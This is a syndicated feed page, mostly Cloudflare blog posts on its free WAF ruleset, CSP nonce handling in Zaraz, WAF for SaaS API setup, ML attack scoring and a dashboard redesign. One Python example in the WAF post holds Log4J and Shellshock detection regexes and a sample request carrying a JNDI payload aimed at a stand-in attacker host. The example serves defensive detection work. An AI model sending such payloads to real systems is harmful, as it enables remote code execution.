Post Syndicated from Geographics original https://www.youtube.com/watch?v=MRTsVlWRDLA

Security updates for Tuesday

Post Syndicated from original https://lwn.net/Articles/887914/

Security updates have been issued by Debian (spip), Fedora (chromium), Mageia (chromium-browser-stable, kernel, kernel-linus, and ruby), openSUSE (firefox, flac, java-11-openjdk, protobuf, tomcat, and xstream), Oracle (thunderbird), Red Hat (kpatch-patch and thunderbird), Scientific Linux (thunderbird), Slackware (httpd), SUSE (firefox, flac, glib2, glibc, java-11-openjdk, libcaca, SDL2, squid, sssd, tomcat, xstream, and zsh), and Ubuntu (zsh).

THG Podcast: Supernatural True Crime

Post Syndicated from The History Guy: History Deserves to Be Remembered original https://www.youtube.com/watch?v=gAv8yT7sVFE

WAF for everyone: protecting the web from high severity vulnerabilities

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/waf-for-everyone/

At Cloudflare, we like disruptive ideas. Pair that with our core belief that security is something that should be accessible to everyone and the outcome is a better and safer Internet for all.

This isn’t idle talk. For example, back in 2014, we announced Universal SSL. Overnight, we provided SSL/TLS encryption to over one million Internet properties without anyone having to pay a dime, or configure a certificate. This was good not only for our customers, but also for everyone using the web.

In 2017, we announced unmetered DDoS mitigation. We’ve never asked customers to pay for DDoS bandwidth as it never felt right, but it took us some time to reach the network size where we could offer completely unmetered mitigation for everyone, paying customer or not.

Still, I often get the question: how do we do this? It’s simple really. We do it by building great, efficient technology that scales well—and this allows us to keep costs low.

Today, we’re doing it again, by providing a Cloudflare WAF (Web Application Firewall) Managed Ruleset to all Cloudflare plans, free of charge.

Why are we doing this?

High profile vulnerabilities have a major impact across the Internet affecting organizations of all sizes. We’ve recently seen this with Log4J, but even before that, major vulnerabilities such as Shellshock and Heartbleed have left scars across the Internet.

Small application owners and teams don’t always have the time to keep up with fast moving security related patches, causing many applications to be compromised and/or used for nefarious purposes.

With millions of Internet properties behind the Cloudflare proxy, we have a duty to help keep the web safe. And that is what we did with Log4J by deploying mitigation rules for all traffic, including FREE zones. We are now formalizing our commitment by providing a Cloudflare Free Managed Ruleset to all plans on top of our new WAF engine.

When are we doing this?

If you are on a FREE plan, you are already receiving protection. Over the coming months, all our FREE zone plan users will also receive access to the Cloudflare WAF user interface in the dashboard and will be able to deploy and configure the new ruleset. This ruleset will provide mitigation rules for high profile vulnerabilities such as Shellshock and Log4J among others.

To access our broader set of WAF rulesets (Cloudflare Managed Rules, Cloudflare OWASP Core Ruleset and Cloudflare Leaked Credential Check Ruleset) along with advanced WAF features, customers will still have to upgrade to PRO or higher plans.

The Challenge

With over 32 million HTTP requests per second being proxied by the Cloudflare global network, running the WAF on every single request is no easy task.

WAFs secure all HTTP request components, including bodies, by running a set of rules, sometimes referred to as signatures, that look for specific patterns that could represent a malicious payload. These rules vary in complexity, and the more rules you have, the harder the system is to optimize. Additionally, many rules take advantage of regex capabilities, allowing the author to perform complex matching logic.
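To make the idea of signature rules concrete, here is a minimal Python sketch of regex rules being run against the components of a request. The rule IDs and patterns are hypothetical and deliberately simplified; they are not Cloudflare's actual signatures, and a production WAF would also normalize and decode the input first.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    rule_id: str
    pattern: re.Pattern


# Hypothetical, simplified signatures for illustration only.
RULES = [
    Rule("log4j-jndi", re.compile(r"\$\{jndi:", re.IGNORECASE)),
    Rule("shellshock", re.compile(r"\(\)\s*\{")),
]


def match_rules(uri: str, headers: dict[str, str], body: str = "") -> list[str]:
    """Return the IDs of all rules whose pattern appears in any request component."""
    components = [uri, body, *headers.values()]
    return [
        rule.rule_id
        for rule in RULES
        if any(rule.pattern.search(part) for part in components)
    ]


hits = match_rules(
    "/search?q=${jndi:ldap://evil.example/a}",
    {"User-Agent": "curl/8.0"},
)
```

Every rule is checked against every component, which hints at why the cost grows with the number of rules and why the engine underneath has to be heavily optimized.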

All of this needs to happen with a negligible latency impact, as security should not come with a performance penalty and many application owners come to Cloudflare for performance benefits.

By leveraging our new Edge Rules Engine, on top of which the new WAF has been built, we have been able to reach the performance and memory milestones that make us comfortable providing good baseline WAF protection to everyone. Enter the new Cloudflare Free Managed Ruleset.

The Free Cloudflare Managed Ruleset

This ruleset is automatically deployed on any new Cloudflare zone and is specially designed to reduce false positives to a minimum across a very broad range of traffic types. Customers will be able to disable the ruleset, if necessary, or configure the traffic filter or individual rules. As of today, the ruleset contains the following rules:

- Log4J rules matching payloads in the URI and HTTP headers;

- Shellshock rules;

- Rules matching very common WordPress exploits.

Whenever a rule matches, an event will be generated in the Security Overview tab, allowing you to inspect the request.

Deploying and configuring

For all new FREE zones, the ruleset will be automatically deployed. The rules are battle tested across the Cloudflare network and are safe to deploy on most applications out of the box. Customers can, in any case, configure the ruleset further by:

- Overriding all rules to LOG or other action.

- Overriding specific rules only to LOG or other action.

- Completely disabling the ruleset or any specific rule.

All options are easily accessible via the dashboard, but can also be performed via API. Documentation on how to configure the ruleset, once it is available in the UI, will be found on our developer site.
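As a rough illustration of the three configuration options above, the following Python sketch builds the kind of JSON payload an API call might carry. The field names (`execute`, `action_parameters`, `overrides`) follow the general shape of Cloudflare's Rulesets API as we understand it, and the IDs are placeholders; treat all of it as an assumption and check the developer documentation before relying on it. No request is sent.

```python
import json


def managed_ruleset_override(ruleset_id, action=None, rule_overrides=None, enabled=True):
    """Build a payload that executes a managed ruleset with optional overrides.

    ruleset_id and the rule IDs in rule_overrides are placeholders (assumptions).
    """
    overrides = {}
    if action is not None:
        # Override the action of every rule in the ruleset, e.g. "log".
        overrides["action"] = action
    if rule_overrides:
        # Override only specific rules, e.g. {"<RULE_ID>": {"action": "log"}}.
        overrides["rules"] = [
            {"id": rule_id, **settings} for rule_id, settings in rule_overrides.items()
        ]
    if not enabled:
        # Disable the whole ruleset.
        overrides["enabled"] = False

    rule = {
        "action": "execute",
        "expression": "true",
        "action_parameters": {"id": ruleset_id},
    }
    if overrides:
        rule["action_parameters"]["overrides"] = overrides
    return {"rules": [rule]}


log_everything = managed_ruleset_override("<RULESET_ID>", action="log")
log_one_rule = managed_ruleset_override(
    "<RULESET_ID>", rule_overrides={"<RULE_ID>": {"action": "log"}}
)
print(json.dumps(log_everything, indent=2))
```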

What’s next?

The Cloudflare Free Managed Ruleset will be updated by Cloudflare whenever a relevant wide-ranging vulnerability is discovered. Updates to the ruleset will be published on our change log, so that customers can keep up to date with any new rules.

We love building cool new technology. But we also love making it widely available and easy to use. We’re really excited about making the web much safer for everyone with a WAF that won’t cost you a dime. If you’re interested in getting started, just head over here to sign up for our free plan.

Cloudflare Zaraz supports CSP

Post Syndicated from Simona Badoiu original https://blog.cloudflare.com/cloudflare-zaraz-supports-csp/

Cloudflare Zaraz can be used to manage and load third-party tools on the cloud, achieving significant speed, privacy and security improvements. Content Security Policy (CSP) configuration prevents malicious content from being run on your website.

If you have Cloudflare Zaraz enabled on your website, you don’t have to think twice about enabling CSP, because there’s no harmful collision between CSP and Cloudflare Zaraz.

Why would Cloudflare Zaraz collide with CSP?

Cloudflare Zaraz, at its core, injects a <script> block on every page where it runs. If the website enforces CSP rules, the injected script can be automatically blocked if inline scripts are not allowed. To prevent this, at the moment of script injection, Cloudflare Zaraz adds a nonce to the script-src policy in order for everything to work smoothly.

Cloudflare Zaraz supports CSP whether it is enabled through Content-Security-Policy headers or through Content-Security-Policy <meta> blocks.

What is CSP?

Content Security Policy (CSP) is a security standard meant to protect websites from Cross-site scripting (XSS) or Clickjacking by providing the means to list approved origins for scripts, styles, images or other web resources.

Although CSP is a reasonably mature technology with most modern browsers already implementing the standard, fewer than 10% of websites use this extra layer of security. A Google study says that more than 90% of the websites using CSP still leave some doors open for attackers.

Why this low adoption and poor configuration? An early study on ‘why CSP adoption is failing’ says that the initial setup for a website is tedious and can generate errors, risking doing more harm for the business than an occasional XSS attack.

We’re writing this to confirm that Cloudflare Zaraz will comply with your CSP settings without any other additional configuration from your side and to share some interesting findings from our research regarding how CSP works.

What is Cloudflare Zaraz?

Cloudflare Zaraz aims to make the web faster by moving third-party script bloat away from the browser.

Almost every website on the Internet loads tens of third-party tools (analytics, tracking, chatbots, banners, embeds, widgets etc.). Most of the time, each third party plays only a small role on a particular website compared to the large volume of complex code it ships (for a good reason, because that code is meant to deal with every issue the tool can tackle). Loading this code again and again on every website is simply inefficient.

Cloudflare Zaraz reduces the amount of code executed on the client side and the amount of time consumed by the client with anything that is not directly serving the user and their experience on the web.

At the same time, Cloudflare Zaraz does the integration between website owners and third-parties by providing a common management interface with an easy ‘one-click’ method.

Cloudflare Zaraz & CSP

When auto-inject is enabled, Cloudflare Zaraz ‘bootstraps’ on your website by running a small inline script that collects basic information from the browser (Screen Resolution, User-Agent, Referrer, page URL) and also provides the main `track` function. The `track` function allows you to track the actions your users are taking on your website, and other events that might happen in real time. Common user actions a website will probably be interested in tracking are successful sign-ups, calls-to-action clicks, and purchases.

Before adding CSP support, Cloudflare Zaraz would’ve been blocked on any website that implemented CSP and didn’t include ‘unsafe-inline’ in the script-src policy or default-src policy. Some of our users reported conflicts between CSP and Cloudflare Zaraz, so we decided to make peace with CSP once and for all.

To solve the issue, when Cloudflare Zaraz is automatically injected on a website implementing CSP, it enhances the response header by appending a nonce value in the script-src policy. This way we make sure we’re not harming any security that was already enforced by the website owners, and we are still able to perform our duties – making the website faster and more secure by asynchronously running third parties on the server side instead of clogging the browser with irrelevant computation from the user’s point of view.

CSP – Edge Cases

In the following paragraphs we describe some interesting CSP details we had to tackle to bring Cloudflare Zaraz to a trustworthy state. They assume that you already know what CSP is and what a simple CSP configuration looks like.

Dealing with multiple CSP headers/<meta> elements

The CSP standard allows multiple CSP headers but, at first glance, it’s slightly unclear how multiple headers are handled.

You might expect the CSP rules to be merged somehow, with the final policy being a combination of all of them, but in reality the rule is much simpler: every policy is enforced, so the most restrictive one always wins. Relevant examples can be found in the w3c’s standard description and in this multiple CSP headers example.

The rule of thumb is that “A connection will be allowed only if all the CSP headers will allow it”.

In order to make sure that the Cloudflare Zaraz script is always running, we’re adding the nonce value to all the existing CSP headers and/or <meta http-equiv="Content-Security-Policy"> blocks.
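The rule of thumb for multiple policies can be sketched in a few lines of Python. This is a heavily simplified model, not a real CSP implementation: it only does exact string matching on script sources and ignores schemes, wildcards, 'self', nonces and hashes. The function names are ours.

```python
def parse_policy(policy: str) -> dict[str, list[str]]:
    """Split a CSP string into {directive: [source, ...]}."""
    directives: dict[str, list[str]] = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            # Keep the first occurrence of a directive; later duplicates are ignored.
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def script_host_allowed(policy: str, host: str) -> bool:
    """Check one policy, falling back to default-src when script-src is absent."""
    directives = parse_policy(policy)
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return True  # this policy does not restrict scripts at all
    return "*" in sources or host in sources


def allowed_by_all(policies: list[str], host: str) -> bool:
    """A script is allowed only if every policy allows it."""
    return all(script_host_allowed(policy, host) for policy in policies)


policies = [
    "script-src https://a.example https://b.example",
    "script-src https://a.example",
]
```

With these two policies, `https://b.example` is rejected even though the first header lists it, which is why a nonce has to be added to every header and <meta> block rather than to just one of them.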

Adding a nonce to a CSP header that already allows unsafe-inline

Just like when sending multiple CSP headers, when configuring one policy with multiple values, the most restrictive value has priority.

An illustrative example for a given CSP header:

Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' 'nonce-12345678'

If 'unsafe-inline' is set in the script-src policy, adding 'nonce-12345678' will disable the effect of 'unsafe-inline' and allow only inline scripts that carry that nonce value.

This is a mistake we already made while trying to make Cloudflare Zaraz compliant with CSP. However, we solved it by adding the nonce only in the following situations:

- If ‘unsafe-inline’ is not already present in the header.

- If ‘unsafe-inline’ is present in the header but a ‘nonce-…’ or ‘sha…’ value is already set next to it (because in this situation ‘unsafe-inline’ is practically disabled).
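The two conditions above translate into a small decision function. This is a sketch of the logic as described, not Cloudflare Zaraz's actual code; the function name and the list of hash prefixes are our assumptions.

```python
# Source expressions that already neutralize 'unsafe-inline' when present.
NONCE_OR_HASH_PREFIXES = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def should_add_nonce(script_src_sources: list[str]) -> bool:
    """Decide whether appending a nonce is safe for the given script-src sources."""
    lowered = [source.lower() for source in script_src_sources]
    if "'unsafe-inline'" not in lowered:
        # Case 1: inline scripts are not allowed yet, so a nonce is needed.
        return True
    # Case 2: 'unsafe-inline' is present but already overridden by a nonce or hash.
    return any(source.startswith(NONCE_OR_HASH_PREFIXES) for source in lowered)
```

When the function returns False, the site relies on 'unsafe-inline', and adding a nonce would silently break its other inline scripts.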

Adding the script-src policy if it doesn’t exist already

Another interesting case we had to tackle was handling a CSP header that didn’t include the script-src policy and relied only on the default-src values. In this case, we copy all the default-src values to a new script-src policy and append the nonce associated with the Cloudflare Zaraz script to it (keeping in mind the previous point, of course).
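Putting the pieces together, here is a minimal Python sketch of rewriting a single policy string: it creates script-src from default-src when needed and appends the nonce only when that is safe. It is an illustration under our own assumptions, not the real implementation. In particular, leaving a policy untouched when it has neither script-src nor default-src is our choice, and special values such as 'none' are not handled.

```python
NONCE_OR_HASH_PREFIXES = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def _nonce_is_safe(sources: list[str]) -> bool:
    lowered = [source.lower() for source in sources]
    if "'unsafe-inline'" not in lowered:
        return True
    return any(source.startswith(NONCE_OR_HASH_PREFIXES) for source in lowered)


def add_nonce(policy: str, nonce: str) -> str:
    """Return the policy with the nonce added to script-src where appropriate."""
    directives: list[tuple[str, list[str]]] = []
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives.append((tokens[0].lower(), tokens[1:]))

    if "script-src" not in [name for name, _ in directives]:
        default = next((srcs for name, srcs in directives if name == "default-src"), None)
        if default is None:
            return policy  # assumption: nothing restricts scripts, leave as-is
        # Copy the default-src values into a new script-src directive.
        directives.append(("script-src", list(default)))

    rewritten = []
    for name, sources in directives:
        if name == "script-src" and _nonce_is_safe(sources):
            sources = sources + [f"'nonce-{nonce}'"]
        rewritten.append(" ".join([name, *sources]))
    return "; ".join(rewritten)


result = add_nonce("default-src 'self'", "abc")
```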

Notes

Cloudflare Zaraz is still not 100% compliant with CSP because some tools still need to use eval() – usually for setting cookies, but we’re already working on a different approach so, stay tuned!

The Content-Security-Policy-Report-Only header is not modified by Cloudflare Zaraz yet – you’ll be seeing error reports regarding the Cloudflare Zaraz <script> element if Cloudflare Zaraz is enabled on your website.

A Content-Security-Policy-Report-Only policy cannot be set using a <meta> element.

Conclusion

Cloudflare Zaraz supports the evolution of a more secure web by seamlessly complying with CSP.

If you encounter any issue or potential edge case that we didn’t cover in our approach, don’t hesitate to write on Cloudflare Zaraz’s Discord Channel. We’re always there fixing issues, listening to feedback and announcing exciting product updates.

For more details on how Cloudflare Zaraz works and how to use it, check out the official documentation.

Resources:

[1] https://wiki.mozilla.org/index.php?title=Security/CSP/Spec&oldid=133465

[2] https://storage.googleapis.com/pub-tools-public-publication-data/pdf/45542.pdf

[3] https://en.wikipedia.org/wiki/Content_Security_Policy

[4] https://www.w3.org/TR/CSP2/#enforcing-multiple-policies

[5] https://chrisguitarguy.com/2019/07/05/working-with-multiple-content-security-policy-headers/

[6] https://www.bitsight.com/blog/content-security-policy-limits-dangerous-activity-so-why-isnt-everyone-doing-it

[7] https://wkr.io/publication/raid-2014-content_security_policy.pdf

Security for SaaS providers

Post Syndicated from Dina Kozlov original https://blog.cloudflare.com/waf-for-saas/

Some of the largest Software-as-a-Service (SaaS) providers use Cloudflare as the underlying infrastructure to provide their customers with fast loading times, unparalleled redundancy, and the strongest security — all through our Cloudflare for SaaS product. Today, we’re excited to give our SaaS providers new tools that will help them enhance the security of their customers’ applications.

For our Enterprise customers, we’re bringing WAF for SaaS — the ability for SaaS providers to easily create and deploy different sets of WAF rules for their customers. This gives SaaS providers the ability to segment customers into different groups based on their security requirements.

For developers who are getting their application off the ground, we’re thrilled to announce a Free tier of Cloudflare for SaaS for the Free, Pro, and Biz plans, giving our customers 100 custom hostnames free of charge to provision and test across their account. In addition to that, we want to make it easier for developers to scale their applications, so we’re happy to announce that we are lowering our custom hostname price from \$2 to \$0.10 a month.

But that’s not all! At Cloudflare, we believe security should be available for all. That’s why we’re extending a new selection of WAF rules to Free customers — giving all customers the ability to secure both their applications and their customers’.

Making SaaS infrastructure available to all

At Cloudflare, we take pride in our Free tier which gives any customer the ability to make use of our Network to stay secure and online. We are eager to extend the same support to customers looking to build a new SaaS offering, giving them a Free tier of Cloudflare for SaaS and allowing them to onboard 100 custom hostnames at no charge. The 100 custom hostnames will be automatically allocated to new and existing Cloudflare for SaaS customers. Beyond that, we are also dropping the custom hostname price from \$2 to \$0.10 a month, giving SaaS providers the power to onboard and scale their application. Existing Cloudflare for SaaS customers will see the updated custom hostname pricing reflected in their next billing cycle.

Cloudflare for SaaS started as a TLS certificate issuance product for SaaS providers. Now, we’re helping our customers go a step further in keeping their customers safe and secure.

Introducing WAF for SaaS

SaaS providers may have varying customer bases — from mom-and-pop shops to well established banks. No matter the customer, it’s important that as a SaaS provider you’re able to extend the best protection for your customers, regardless of their size.

At Cloudflare, we have spent years building out the best Web Application Firewall for our customers. From managed rules that offer advanced zero-day vulnerability protections to OWASP rules that block popular attack techniques, we have given our customers the best tools to keep themselves protected. Now, we want to hand off the tools to our SaaS providers who are responsible for keeping their customer base safe and secure.

One of the benefits of Cloudflare for SaaS is that SaaS providers can configure security rules and settings on their SaaS zone which their customers automatically inherit. But one size does not fit all, which is why we are excited to give Enterprise customers the power to create various sets of WAF rules that they can then extend as different security packages to their customers — giving end users differing levels of protection depending on their needs.

Getting Started

WAF for SaaS can be easily set up. We have an example below that shows how you can configure different buckets of WAF rules for your various customers.

There’s no limit to the number of rulesets that you can create, so feel free to create a handful of configurations for your customers, or deploy one ruleset per customer — whatever works for you!

End-to-end example

Step 1 – Define custom hostname

Cloudflare for SaaS customers define their customer’s domains by creating custom hostnames. Custom hostnames indicate which domains need to be routed to the SaaS provider’s origin. Custom hostnames can define specific domains, like example.com, or they can extend to wildcards like *.example.com which allows subdomains under example.com to get routed to the SaaS service. WAF for SaaS supports both types of custom hostnames, so that SaaS providers have flexibility in choosing the scope of their protection.

The first step is to create a custom hostname to define your customer’s domain. This can be done through the dashboard or the API.

curl -X POST "https://api.cloudflare.com/client/v4/zones/{zone:id}/custom_hostnames" \
  -H "X-Auth-Email: {email}" -H "X-Auth-Key: {key}" \
  -H "Content-Type: application/json" \
  --data '{
    "hostname": "example.com",
    "ssl": {"wildcard": true}
  }'

Step 2 – Associate custom metadata to a custom hostname

Next, create an association between the custom hostnames — your customer’s domain — and the firewall ruleset that you’d like to attach to it.

This is done by associating a JSON blob with a custom hostname. Our product, Custom Metadata, allows customers to easily do this via API.

In the example below, a JSON blob with two fields (“customer_id” and “security_level”) will be associated to each request for *.example.com and example.com.

There is no predetermined schema for custom metadata. Field names and structure are fully customisable based on our customer’s needs. In this example, we have chosen the tag “security_level” to which we expect to assign three values (low, medium or high). These will, in turn, trigger three different sets of rules.

curl -s -X PATCH "https://api.cloudflare.com/client/v4/zones/{zone:id}/custom_hostnames/{custom_hostname:id}" \
  -H "X-Auth-Email: {email}" -H "X-Auth-Key: {key}" \
  -H "Content-Type: application/json" \
  -d '{
    "custom_metadata": {
      "customer_id": "12345",
      "security_level": "low"
    }
  }'

Step 3 – Trigger security products based on tags

Finally, you can trigger a rule based on the custom hostname. The custom metadata field e.g. “security_level” is available in the Ruleset Engine where the WAF runs. In this example, “security_level” can be used to trigger different configurations of products such as WAF, Firewall Rules, Advanced Rate Limiting and Transform Rules.

Rules can be built through the dashboard or via the API, as shown below. Here, a rate limiting rule is triggered on traffic with “security_level” set to low.

curl -X PUT "https://api.cloudflare.com/client/v4/zones/{zone:id}/rulesets/phases/http_ratelimit/entrypoint" \
  -H "X-Auth-Email: {email}" -H "X-Auth-Key: {key}" \
  -H "Content-Type: application/json" \
  -d '{
    "rules": [
      {
        "action": "block",
        "ratelimit": {
          "characteristics": [
            "cf.colo.id",
            "ip.src"
          ],
          "period": 10,
          "requests_per_period": 2,
          "mitigation_timeout": 60
        },
        "expression": "lookup_json_string(cf.hostname.metadata, \"security_level\") eq \"low\" and http.request.uri contains \"login\""
      }
    ]
  }'
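To show what the rule above expresses, here is a small Python model of its two halves: the expression that selects traffic, and a counter that blocks a client once it exceeds the limit. It only emulates the semantics for illustration. The fixed-window counting is our simplification and is not a description of how Cloudflare's rate limiting is implemented.

```python
import json


def lookup_json_string(metadata_json: str, key: str):
    """Emulate the lookup of a string field in the hostname's custom metadata."""
    try:
        value = json.loads(metadata_json).get(key)
    except (json.JSONDecodeError, AttributeError):
        return None
    return value if isinstance(value, str) else None


def rule_matches(hostname_metadata: str, uri: str) -> bool:
    """security_level eq "low" and the URI contains "login"."""
    return lookup_json_string(hostname_metadata, "security_level") == "low" and "login" in uri


class RateLimiter:
    """Fixed-window counter keyed by the rule's characteristics (colo ID, source IP)."""

    def __init__(self, period=10, requests_per_period=2, mitigation_timeout=60):
        self.period = period
        self.requests_per_period = requests_per_period
        self.mitigation_timeout = mitigation_timeout
        self._windows = {}        # key -> (window_start, count)
        self._blocked_until = {}  # key -> timestamp

    def allow(self, key, now: float) -> bool:
        if now < self._blocked_until.get(key, 0.0):
            return False  # still inside the mitigation timeout
        start, count = self._windows.get(key, (now, 0))
        if now - start >= self.period:
            start, count = now, 0  # start a new counting window
        count += 1
        self._windows[key] = (start, count)
        if count > self.requests_per_period:
            self._blocked_until[key] = now + self.mitigation_timeout
            return False
        return True


metadata = '{"customer_id": "12345", "security_level": "low"}'
limiter = RateLimiter()
client = ("colo-1", "203.0.113.7")
decisions = [limiter.allow(client, now=t) for t in (0, 1, 2, 30, 63)]
```

With the values from the rule (2 requests per 10 seconds, 60 seconds of mitigation), the third request inside the window is blocked and the client stays blocked until the timeout has elapsed.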

If you’d like to learn more about our Advanced Rate Limiting rules, check out our documentation.

Conclusion

We’re excited to be the provider for our SaaS customers’ infrastructure needs. From custom domains to TLS certificates to Web Application Firewall, we’re here to help. Sign up for Cloudflare for SaaS today, or if you’re an Enterprise customer, reach out to your account team to get started with WAF for SaaS.

Improving the WAF with Machine Learning

Post Syndicated from Daniele Molteni original https://blog.cloudflare.com/waf-ml/

Cloudflare handles 32 million HTTP requests per second and is used by more than 22% of all the websites whose web server is known by W3Techs. Cloudflare is in the unique position of protecting traffic for 1 out of 5 Internet properties which allows it to identify threats as they arise and track how these evolve and mutate.

The Web Application Firewall (WAF) sits at the core of Cloudflare’s security toolbox and Managed Rules are a key feature of the WAF. They are a collection of rules created by Cloudflare’s analyst team that block requests when they show patterns of known attacks. These managed rules work extremely well for patterns of established attack vectors, as they have been extensively tested to minimize both false negatives (missing an attack) and false positives (finding an attack when there isn’t one). On the downside, managed rules often miss attack variations (also known as bypasses) as static regex-based rules are intrinsically sensitive to signature variations introduced, for example, by fuzzing techniques.

We witnessed this issue when we released protections for log4j. For a few days, after the vulnerability was made public, we had to constantly update the rules to match variations and mutations as attackers tried to bypass the WAF. Moreover, optimizing rules requires significant human intervention, and it usually works only after bypasses have been identified or even exploited, making the protection reactive rather than proactive.

Today we are excited to complement managed rulesets (such as OWASP and Cloudflare Managed) with a new tool aimed at identifying bypasses and malicious payloads without human involvement, and before they are exploited. Customers can now access signals from a machine learning model trained on the good/bad traffic as classified by managed rules and augmented data to provide better protection across a broader range of old and new attacks.

Welcome to our new Machine Learning WAF detection.

The new detection is available in Early Access for Enterprise, Pro and Biz customers. Please join the waitlist if you are interested in trying it out. In the long term, it will be available to the higher tier customers.

Improving the WAF with learning capabilities

The new detection system complements existing managed rulesets by providing three major advantages:



- It runs on all of your traffic. Each request is scored based on the likelihood that it contains a SQLi or XSS attack, for example. This enables a new WAF analytics experience that allows you to explore trends and patterns in your overall traffic.

- Detection rate improves based on past traffic and feedback. The model is trained on good and bad traffic as categorized by managed rules across all Cloudflare traffic. This allows small sites to get the same level of protection as the largest Internet properties.

- A new definition of performance. The machine learning engine identifies bypasses and anomalies before they are exploited or identified by human researchers.

The secret sauce is a combination of innovative machine learning modeling, a vast training dataset built on the attacks we block daily as well as data augmentation techniques, the right evaluation and testing framework based on the behavioral testing principle and cutting-edge engineering that allows us to assess each request with negligible latency.

A new WAF experience

The new detection is based on the paradigm launched with Bot Analytics. Following this approach, each request is evaluated, and a score assigned, regardless of whether we are taking actions on it. Since we score every request, users can visualize how the score evolves over time for the entirety of the traffic directed to their server.

Furthermore, users can visualize the histogram of how requests were scored for a specific attack vector (such as SQLi) and find what score is a good value to separate good from bad traffic.
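As a rough sketch of what sits behind such a histogram, the following Python snippet buckets a list of scores into ranges of ten. It assumes the 1 to 99 score range the post describes in the next section; the function name and the sample scores are made up.

```python
from collections import Counter


def score_histogram(scores: list[int], bucket_size: int = 10) -> dict[str, int]:
    """Count scores per bucket, e.g. 1-10, 11-20, ..., 91-99."""
    counts = Counter((score - 1) // bucket_size for score in scores)
    return {
        f"{bucket * bucket_size + 1}-{min((bucket + 1) * bucket_size, 99)}": counts[bucket]
        for bucket in sorted(counts)
    }


histogram = score_histogram([1, 5, 12, 95, 99, 98])
```

A gap between a cluster of low scores and a cluster of high scores is a natural place to put the threshold that separates bad traffic from good.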



The actual mitigation is performed with custom WAF rules where the score is used to decide which requests should be blocked. This allows customers to create rules whose logic includes any parameter of the HTTP requests, including the dynamic fields populated by Cloudflare, such as bot scores.

We are now looking at extending this approach to work for the managed rules too (OWASP and Cloudflare Managed). Customers will be able to identify trends and create rules based on patterns that are visible when looking at their overall traffic, rather than creating rules by trial and error, logging traffic to validate them and only then enforcing protection.

How does it work?

Machine learning–based detections complement the existing managed rulesets, such as OWASP and Cloudflare Managed. The system is based on models designed to identify variations of attack patterns and anomalies without the direct supervision of researchers or the end user.

As of today, we expose scores for two attack vectors: SQL injection and Cross Site Scripting. Users can create custom WAF/Firewall rules using three separate scores: a total score (cf.waf.ml.score), one for SQLi and one for XSS (cf.waf.ml.score.sqli, cf.waf.ml.score.xss, respectively). The scores can have values between 1 and 99, with 1 being definitely malicious and 99 being valid traffic.
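Since lower scores mean more suspicious traffic, a custom rule would typically act on requests that fall below a threshold. The Python sketch below models that decision. The field names come from the text above, while the threshold of 20 and the function name are hypothetical and would need tuning against your own traffic.

```python
# The same logic written as a rule expression might look like this (an assumption):
RULE_EXPRESSION = "cf.waf.ml.score.sqli lt 20 or cf.waf.ml.score.xss lt 20"


def action_for(scores: dict[str, int], threshold: int = 20) -> str:
    """Return "block" when either attack score is below the threshold."""
    if (
        scores["cf.waf.ml.score.sqli"] < threshold
        or scores["cf.waf.ml.score.xss"] < threshold
    ):
        return "block"
    return "allow"


suspicious = {"cf.waf.ml.score": 4, "cf.waf.ml.score.sqli": 3, "cf.waf.ml.score.xss": 88}
clean = {"cf.waf.ml.score": 95, "cf.waf.ml.score.sqli": 97, "cf.waf.ml.score.xss": 96}
```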

The model is trained on traffic classified by the existing WAF rules, and it works on a transformed version of the original request, making it easier to identify fingerprints of attacks.



For each request, the model scores each part of the request independently so that it’s possible to identify where malicious payloads were identified, for example, in the body of the request, the URI or headers.
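Per-part scoring makes it possible to point at the component that triggered a detection. As a minimal illustration, assuming a dictionary of per-part scores (the part names and values here are invented, and the post does not say how they are combined into the total score):

```python
def most_suspicious_part(part_scores: dict[str, int]) -> tuple[str, int]:
    """Return the request part with the lowest (most malicious) score."""
    return min(part_scores.items(), key=lambda item: item[1])


part, score = most_suspicious_part({"uri": 90, "headers": 85, "body": 3})
```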

This looks easy on paper, but there are a number of challenges that Cloudflare engineers had to solve to get here. These include building a reliable dataset, scaling data labeling, selecting the right model architecture, and executing the categorization on every request processed by Cloudflare’s global network (i.e. 32 million times per second).

In the coming weeks, the Engineering team will publish a series of blog posts which will give a better understanding of how the solution works under the hood.

Looking forward

In the coming months, we are going to release the new detection engine to customers and collect their feedback on its performance. Long term, we are planning to extend the detection engine to cover all attack vectors already identified by managed rules and use the attacks blocked by the machine learning model to further improve our managed rulesets.

A new WAF experience

Post Syndicated from Zhiyuan Zheng original https://blog.cloudflare.com/new-waf-experience/



Around three years ago, we brought multiple features into the Firewall tab in our dashboard navigation, with the motivation “to make our products and services intuitive.” Having worked hard to expand our capabilities over the past three years, we want to take another opportunity to evaluate how intuitive Cloudflare WAF (Web Application Firewall) is.

Our customers lead the way to new WAF

The security landscape is moving fast; types of web applications are growing rapidly; and within the industry there are various approaches to what a WAF includes and can offer. Cloudflare not only proxies enterprise applications, but also millions of personal blogs, community sites, and small business stores. This diversity of use cases is covered by the various products we offer; however, these products are currently scattered, which makes it unclear which protection rules are active. This pushes us to reflect on how we can best support our customers in getting the most value out of WAF by providing a clearer offering that meets expectations.

A few months ago, we reached out to our customers to answer a simple question: what do you consider to be part of WAF? We employed a range of user research methods including card sorting, tree testing, design evaluation, and surveys to help with this. The results of this research illustrated how our customers think about WAF, what it means to them, and how it supports their use cases. This inspired the product team to expand scope and contemplate what (Web Application) Security means, beyond merely the WAF.

Based on what hundreds of customers told us, our user research and product design teams collaborated with product management to rethink the security experience. We examined our assumptions and assessed the effectiveness of design concepts to create a structure (or information architecture) that reflected our customers’ mental models.

This new structure consolidates firewall rules, managed rules, and rate limiting rules to become a part of WAF. The new WAF strives to be the one-stop shop for web application security as it pertains to differentiating malicious from clean traffic.

As of today, you will see the following changes to our navigation:

- Firewall is being renamed to Security.

- Under Security, you will now find WAF.

- Firewall rules, managed rules, and rate limiting rules will now appear under WAF.

From now on, when we refer to WAF, we will be referring to the above three features.

